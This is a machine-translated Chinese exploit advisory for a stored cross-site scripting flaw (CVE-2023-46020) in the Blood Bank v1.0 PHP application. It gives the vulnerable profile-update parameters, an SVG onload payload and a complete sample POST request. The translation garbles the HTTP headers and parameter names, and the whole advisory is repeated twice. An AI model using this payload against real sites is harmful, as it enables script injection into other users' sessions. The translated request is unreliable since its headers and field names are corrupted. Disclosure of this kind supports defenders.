#利用标题:血库v1.0存储的跨站点脚本(XSS)
#日期: 2023-11-14
#利用作者: Ersin Erenler
#供应商homepage3360 https://code-projects.org/blood-bank-in-php-with-with-source-code
#软件link: https://download-media.code-project...n_in_php_with_with_source_source_code.zip.zip
#版本: 1.0
#在: Windows/Linux,Apache 2.4.54,PHP 8.2.0测试
#CVE : CVE-2023-46020
----------------------------------------------------------------------------------------------------------------------------
#Description:
参数重命名,回复,rphone和rcity在/file/updateprofile.php文件中,代码项目的血液库V1.0易受存储的跨站点脚本(XSS)的影响。由于输入验证和用户提供的数据的卫生性不足,因此出现了这种漏洞。攻击者可以通过将恶意脚本注入这些参数来利用此弱点,当其他用户查看受影响的用户的配置文件时,可以在服务器上存储时执行。
脆弱的文件: UpdateProfile.php
参数:重命名,回复,Rphone,rcity
#概念证明:
--------------------------------------
1。通过Burp Suite拦截更新profile.php的邮政请求
2。将有效载荷注入脆弱参数
3。PAYLOAD:'SVG/ONLOAD=alert(document.domain)
4。示例请求RNAME参数:
---
post/bloodbank/file/updateprofile.php http/1.1
HOST: LOCALHOST
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)gecko/20100101 Firefox/119.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 103
Origin: http://localhost
连接:关闭
Referer: http://localhost/bloodbank/rprofile.php?id=1
cookie: phpsessid=某些cookie-value
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
rname=test'svg/onload=alert(document.domain)remail=test%40gmail.comrpassword=testrphore=8875643456rcity=lucknowbg=a%2bupdate=更新
-----
5。转到个人资料页面并触发XSS
XSS有效:
'svg/onload=alert(document.domain)
#日期: 2023-11-14
#利用作者: Ersin Erenler
#供应商homepage3360 https://code-projects.org/blood-bank-in-php-with-with-source-code
#软件link: https://download-media.code-project...n_in_php_with_with_source_source_code.zip.zip
#版本: 1.0
#在: Windows/Linux,Apache 2.4.54,PHP 8.2.0测试
#CVE : CVE-2023-46020
----------------------------------------------------------------------------------------------------------------------------
#Description:
参数重命名,回复,rphone和rcity在/file/updateprofile.php文件中,代码项目的血液库V1.0易受存储的跨站点脚本(XSS)的影响。由于输入验证和用户提供的数据的卫生性不足,因此出现了这种漏洞。攻击者可以通过将恶意脚本注入这些参数来利用此弱点,当其他用户查看受影响的用户的配置文件时,可以在服务器上存储时执行。
脆弱的文件: UpdateProfile.php
参数:重命名,回复,Rphone,rcity
#概念证明:
--------------------------------------
1。通过Burp Suite拦截更新profile.php的邮政请求
2。将有效载荷注入脆弱参数
3。PAYLOAD:'SVG/ONLOAD=alert(document.domain)
4。示例请求RNAME参数:
---
post/bloodbank/file/updateprofile.php http/1.1
HOST: LOCALHOST
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:109.0)gecko/20100101 Firefox/119.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 103
Origin: http://localhost
连接:关闭
Referer: http://localhost/bloodbank/rprofile.php?id=1
cookie: phpsessid=某些cookie-value
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
rname=test'svg/onload=alert(document.domain)remail=test%40gmail.comrpassword=testrphore=8875643456rcity=lucknowbg=a%2bupdate=更新
-----
5。转到个人资料页面并触发XSS
XSS有效:
'svg/onload=alert(document.domain)